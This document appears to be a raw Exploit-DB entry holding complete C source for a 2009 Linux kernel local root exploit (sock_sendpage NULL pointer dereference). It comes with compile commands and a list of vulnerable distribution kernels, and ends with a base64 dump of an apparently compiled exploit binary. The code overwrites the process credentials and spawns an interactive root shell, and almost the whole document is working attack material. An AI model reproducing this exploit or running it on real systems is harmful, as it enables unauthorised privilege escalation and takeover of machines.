https://www.exploit-db.com/raw/9545
/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
* The TASK_RUNNING is the only possible state for a process executing
* in user-space.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int
main(void)
{
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
// milw0rm.com [2009-08-31]
---
-rwxr-xr-x 1 boldi users 9992 2024-06-27 22:19 9545
boldi@linux-xm7e:~/h> base64 9545
f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAcIUECDQAAAC8FwAAAAAAADQAIAAJACgAJQAiAAYAAAA0
AAAANIAECDSABAggAQAAIAEAAAUAAAAEAAAAAwAAAFQBAABUgQQIVIEECBMAAAATAAAABAAAAAEA
AAABAAAAAAAAAACABAgAgAQIqAoAAKgKAAAFAAAAABAAAAEAAAAUDwAAFJ8ECBSfBAgwAQAAPAEA
AAYAAAAAEAAAAgAAACgPAAAonwQIKJ8ECMgAAADIAAAABgAAAAQAAAAEAAAAaAEAAGiBBAhogQQI
IAAAACAAAAAEAAAABAAAAAQAAACIAQAAiIEECIiBBAgYAAAAGAAAAAQAAAAEAAAAUeV0ZAAAAAAA
AAAAAAAAAAAAAAAAAAAABgAAAAQAAABS5XRkFA8AABSfBAgUnwQI7AAAAOwAAAAEAAAAAQAAAC9s
aWIvbGQtbGludXguc28uMgAABAAAABAAAAABAAAAR05VAAAAAAACAAAABgAAAAQAAAAFAAAABAAA
AFN1U0VTdVNFAAAAAAEACgIDAAAAEAAAAA0AAAAPAAAACQAAAAAAAAAAAAAAAAAAAAEAAAADAAAA
AgAAAAUAAAAEAAAAAAAAAAgAAAAGAAAABwAAAAsAAAAMAAAACgAAAA4AAAAAAAAAAAAAAAAAAAAA
AAAAaQAAAAAAAAAjAAAAEgAAAGQAAAAAAAAAZwAAABIAAABMAAAAAAAAAEsAAAASAAAAAQAAAAAA
AAAAAAAAIAAAAIMAAAAAAAAAnwEAABIAAAA1AAAAAAAAAFsBAAASAAAARQAAAAAAAADTAAAAEgAA
ABoAAABcigQIBAAAABEADwBcAAAAAAAAACsAAAASAAAAKQAAAAAAAABCAAAAEgAAAFUAAAAAAAAA
PwAAABIAAAB8AAAAAAAAABEAAAASAAAAOwAAAAAAAABDAAAAEgAAADAAAAAAAAAA4gAAABIAAAB1
AAAAAAAAABEAAAASAAAAAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBfSU9fc3RkaW5fdXNlZABz
b2NrZXQAZXhpdABleGVjbABmdHJ1bmNhdGUAcGVycm9yAHNlbmRmaWxlAHVubGluawBta3N0ZW1w
AG1tYXAAZ2V0cGFnZXNpemUAZ2V0Z2lkAGdldHVpZABfX2xpYmNfc3RhcnRfbWFpbgBHTElCQ18y
LjEAR0xJQkNfMi4wAAAAAAIAAgADAAAAAgACAAIAAQACAAIAAgACAAIAAgACAAAAAQACABAAAAAQ
AAAAAAAAABFpaQ0AAAMAlQAAABAAAAAQaWkNAAACAJ8AAAAAAAAA8J8ECAYEAAAAoAQIBwEAAASg
BAgHAgAACKAECAcDAAAMoAQIBwQAABCgBAgHBQAAFKAECAcGAAAYoAQIBwcAABygBAgHCQAAIKAE
CAcKAAAkoAQIBwsAACigBAgHDAAALKAECAcNAAAwoAQIBw4AADSgBAgHDwAAVYnlg+wI6CEBAADo
eAEAAOiTBQAAycMA/zX4nwQI/yX8nwQIAAAAAP8lAKAECGgAAAAA6eD/////JQSgBAhoCAAAAOnQ
/////yUIoAQIaBAAAADpwP////8lDKAECGgYAAAA6bD/////JRCgBAhoIAAAAOmg/////yUUoAQI
aCgAAADpkP////8lGKAECGgwAAAA6YD/////JRygBAhoOAAAAOlw/////yUgoAQIaEAAAADpYP//
//8lJKAECGhIAAAA6VD/////JSigBAhoUAAAAOlA/////yUsoAQIaFgAAADpMP////8lMKAECGhg
AAAA6SD/////JTSgBAhoaAAAAOkQ////Me1eieGD5PBQVFJokIkECGigiQQIUVZosocECOg/////
9JCQVYnlU4PsBOgAAAAAW4HDVBoAAIuT/P///4XSdAXoCv///1hbycOQkJCQkJBVieWD7AiAPUSg
BAgAdAzrHIPABKNAoAQI/9KhQKAECIsQhdJ168YFRKAECAHJw5BVieWD7AihJJ8ECIXAdBK4AAAA
AIXAdAnHBCQknwQI/9DJw5BVieVXVlOD7CiJ4IlF7ItF7CUA8P//iUXki0XkiwA9////v3YZi0Xk
iwCJReiLReiLAIXAdQiLReiJRdDrR4ngiUXwi0XwJQDg//+JReiLReiLAIXAdQiLVeiJVdDrJotF
6IlF5ItF5IsAiUXoi0XoiwCFwHUIi0XoiUXQ6wfHRdD/////i0XQiUXg6fcAAACLReCLEKFIoAQI
OcIPheEAAACLReCDwASLEKFIoAQIOcIPhcwAAACLReCDwAiLEKFIoAQIOcIPhbcAAACLReCDwAyL
EKFIoAQIOcIPhaIAAACLReCDwBCLEKFMoAQIOcIPhY0AAACLReCDwBSLEKFMoAQIOcJ1fItF4IPA
GIsQoUygBAg5wnVri0Xgg8AcixChTKAECDnCdVqLfeCDxwSLVeCDwgiJVcyLTeCDwQyLXeCDwxCL
deCDxhSLVeCDwhiLReCDwBzHAAAAAACLAIkCiwKJBosGiQOLA4kBiwGLVcyJAotVzIsCiQeLF4tF
4IkQ6w6DReAEg33gAA+F//7//7j/////g8QoW15fXcONTCQEg+Tw/3H8VYnlUYPsRKGTigQIiUXg
oZeKBAiJReShm4oECIlF6KGfigQIiUXs6Ej9//+jSKAECOhu/f//o0ygBAjHRCQUAAAAAMdEJBAA
AAAAx0QkDDIAAADHRCQIBwAAAMdEJAQAEAAAxwQkAAAAAOh1/P//iUXwg33w/3UYxwQkYIoECOiw
/P//xwQkAQAAAOgE/f//i0XwxgD/i0Xwg8ABxgAli0Xwg8ACxwAIAAAAi0Xwg8AIicK4FIYECIkC
x0QkCAAAAADHRCQEAgAAAMcEJB8AAADofvz//4lF9IN99P91GMcEJGWKBAjoSfz//8cEJAEAAADo
nfz//41F4IkEJOhC/P//iUX4g334/3UYxwQkbIoECOgd/P//xwQkAQAAAOhx/P//jUXgiQQk6Db8
//+D+P91GMcEJHSKBAjo9fv//8cEJAEAAADoSfz//+iE+///iUQkBItF+IkEJOgl/P//g/j/dRjH
BCR7igQI6MT7///HBCQBAAAA6Bj8///oU/v//4lEJAzHRCQIAAAAAItF+IlEJASLRfSJBCToVfv/
/8dEJAwAAAAAx0QkCIWKBAjHRCQEiIoECMcEJIuKBAjoYfv//8cEJAAAAADoxfv//5CQkJCQVYnl
XcONdCYAjbwnAAAAAFWJ5VdWU+heAAAAgcNJFgAAg+wc6K/6//+NgyD///+JRfCNgyD///8pRfDB
ffACi1XwhdJ0KzH/icaNtgAAAACLRRCDxwGJRCQIi0UMiUQkBItFCIkEJP8Wg8YEOX3wdd+DxBxb
Xl9dw4scJMOQkJBVieVTg+wEoRSfBAiD+P90EjHb/9CLgxCfBAiD6wSD+P918IPEBFtdw5CQkFWJ
5VOD7AToAAAAAFuBw6wVAADobPv//1lbycMDAAAAAQACAG1tYXAAc29ja2V0AG1rc3RlbXAAdW5s
aW5rAGZ0cnVuY2F0ZQAtaQBzaAAvYmluL3NoAC90bXAvdG1wLlhYWFhYWAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA
AAAAAAEAAAAQAAAADAAAAGiEBAgNAAAAPIoECAQAAACggQQIBQAAAPSCBAgGAAAA9IEECAoAAACp
AAAACwAAABAAAAAVAAAAAAAAAAMAAAD0nwQIAgAAAHAAAAAUAAAAEQAAABcAAAD4gwQIEQAAAPCD
BAgSAAAACAAAABMAAAAIAAAA/v//b8CDBAj///9vAQAAAPD//2+egwQIAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACifBAgAAAAAAAAAAJaEBAimhAQI
toQECMaEBAjWhAQI5oQECPaEBAgGhQQIFoUECCaFBAg2hQQIRoUECFaFBAhmhQQIAAAAAAAAAAAg
nwQIAEdDQzogKEdOVSkgNC4xLjIgMjAwNjExMTUgKHByZXJlbGVhc2UpIChTVVNFIExpbnV4KQAA
R0NDOiAoR05VKSA0LjEuMiAyMDA2MTExNSAocHJlcmVsZWFzZSkgKFNVU0UgTGludXgpAABHQ0M6
IChHTlUpIDQuMS4yIDIwMDYxMTE1IChwcmVyZWxlYXNlKSAoU1VTRSBMaW51eCkAAEdDQzogKEdO
VSkgNC4xLjIgMjAwNjExMTUgKHByZXJlbGVhc2UpIChTVVNFIExpbnV4KQAAR0NDOiAoR05VKSA0
LjEuMiAyMDA2MTExNSAocHJlcmVsZWFzZSkgKFNVU0UgTGludXgpAABHQ0M6IChHTlUpIDQuMS4y
IDIwMDYxMTE1IChwcmVyZWxlYXNlKSAoU1VTRSBMaW51eCkAAEdDQzogKEdOVSkgNC4xLjIgMjAw
NjExMTUgKHByZXJlbGVhc2UpIChTVVNFIExpbnV4KQAALAAAAAIAkQAAAAQAAAAAAJSFBAgmAAAA
aIQECAsAAAA8igQIEwAAAAAAAAAAAAAAJAAAAAIAFQEAAAQAAAAAAH2EBAgCAAAAVIoECAQAAAAA
AAAAAAAAACEAAAACAAAAAACRAAAAeQAAAF9JT19zdGRpbl91c2VkAAAAAACNAAAAAgAAAAAABAEA
AAAAlIUECJSFBAgAAAAAAS8AAACGAAAAAmYAAAAEBwJOAAAAAQgCcwAAAAIHAmEAAAAEBwJQAAAA
AQYCNgAAAAIFA2ludAAEBQJAAAAACAUCXAAAAAgHAkUAAAAEBQJmAAAABAcCVwAAAAEGBKwAAAAB
GYsAAAABBQNcigQIBU8AAAAAgAAAAAIAQgAAAAQBJwAAAAAAAAAvdXNyL3NyYy9wYWNrYWdlcy9C
VUlMRC9nbGliYy0yLjUvY2MtbnB0bC9jc3UvY3J0aS5TAC91c3Ivc3JjL3BhY2thZ2VzL0JVSUxE
L2dsaWJjLTIuNS9jc3UAR05VIEFTIDIuMTcuNTAuMC41AAGAgAAAAAIAVAAAAAQBwAAAACgAAAAv
dXNyL3NyYy9wYWNrYWdlcy9CVUlMRC9nbGliYy0yLjUvY2MtbnB0bC9jc3UvY3J0bi5TAC91c3Iv
c3JjL3BhY2thZ2VzL0JVSUxEL2dsaWJjLTIuNS9jc3UAR05VIEFTIDIuMTcuNTAuMC41AAGAAREB
EAYSAREBJQ4TCwMOGw4AAAIkAAMOCws+CwAAAyQAAwgLCz4LAAAENAADDjoLOwtJEz8MAgoAAAUm
AEkTAAAAAREAEAZVBgMIGwglCBMFAAAAAREAEAZVBgMIGwglCBMFAAAAIwAAAAIAHQAAAAEB+w4N
AAEBAQEAAAABAAABAGluaXQuYwAAAAAAlQAAAAIASwAAAAEB+w4NAAEBAQEAAAABAAABL3Vzci9z
cmMvcGFja2FnZXMvQlVJTEQvZ2xpYmMtMi41L2NjLW5wdGwvY3N1AABjcnRpLlMAAQAAAAAFApSF
BAgDCwEhLyE9WiFnZy8vWiEhIQIBAAEBAAUCaIQECAMjASEvPQIFAAEBAAUCPIoECAMzASEvIT1a
IQIGAAEBcwAAAAIASwAAAAEB+w4NAAEBAQEAAAABAAABL3Vzci9zcmMvcGFja2FnZXMvQlVJTEQv
Z2xpYmMtMi41L2NjLW5wdGwvY3N1AABjcnRuLlMAAQAAAAAFAn2EBAgDCQEhAgEAAQEABQJUigQI
AxIBISEhAgEAAQFHTlUgQyA0LjEuMiAyMDA2MTExNSAocHJlcmVsZWFzZSkgKFNVU0UgTGludXgp
AGluaXQuYwBzaG9ydCBpbnQAbG9uZyBsb25nIGludAB1bnNpZ25lZCBjaGFyAGxvbmcgbG9uZyB1
bnNpZ25lZCBpbnQAc2hvcnQgdW5zaWduZWQgaW50AC91c3Ivc3JjL3BhY2thZ2VzL0JVSUxEL2ds
aWJjLTIuNS9jc3UAX0lPX3N0ZGluX3VzZWQAAAD/////AAAAAJSFBAi6hQQIaIQECHOEBAg8igQI
T4oECAAAAAAAAAAA/////wAAAAB9hAQIf4QECFSKBAhYigQIAAAAAAAAAAAALnN5bXRhYgAuc3Ry
dGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALm5vdGUuU3VTRQAuaGFzaAAuZHlu
c3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWwuZHluAC5yZWwucGx0
AC5pbml0AC50ZXh0AC5maW5pAC5yb2RhdGEALmVoX2ZyYW1lAC5pbml0X2FycmF5AC5jdG9ycwAu
ZHRvcnMALmpjcgAuZHluYW1pYwAuZ290AC5nb3QucGx0AC5kYXRhAC5ic3MALmNvbW1lbnQALmRl
YnVnX2FyYW5nZXMALmRlYnVnX3B1Ym5hbWVzAC5kZWJ1Z19pbmZvAC5kZWJ1Z19hYmJyZXYALmRl
YnVnX2xpbmUALmRlYnVnX3N0cgAuZGVidWdfcmFuZ2VzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAbAAAAAQAAAAIAAABUgQQIVAEAABMAAAAAAAAAAAAAAAEAAAAAAAAA
IwAAAAcAAAACAAAAaIEECGgBAAAgAAAAAAAAAAAAAAAEAAAAAAAAADEAAAAHAAAAAgAAAIiBBAiI
AQAAGAAAAAAAAAAAAAAABAAAAAAAAAA8AAAABQAAAAIAAACggQQIoAEAAFQAAAAFAAAAAAAAAAQA
AAAEAAAAQgAAAAsAAAACAAAA9IEECPQBAAAAAQAABgAAAAEAAAAEAAAAEAAAAEoAAAADAAAAAgAA
APSCBAj0AgAAqQAAAAAAAAAAAAAAAQAAAAAAAABSAAAA////bwIAAACegwQIngMAACAAAAAFAAAA
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
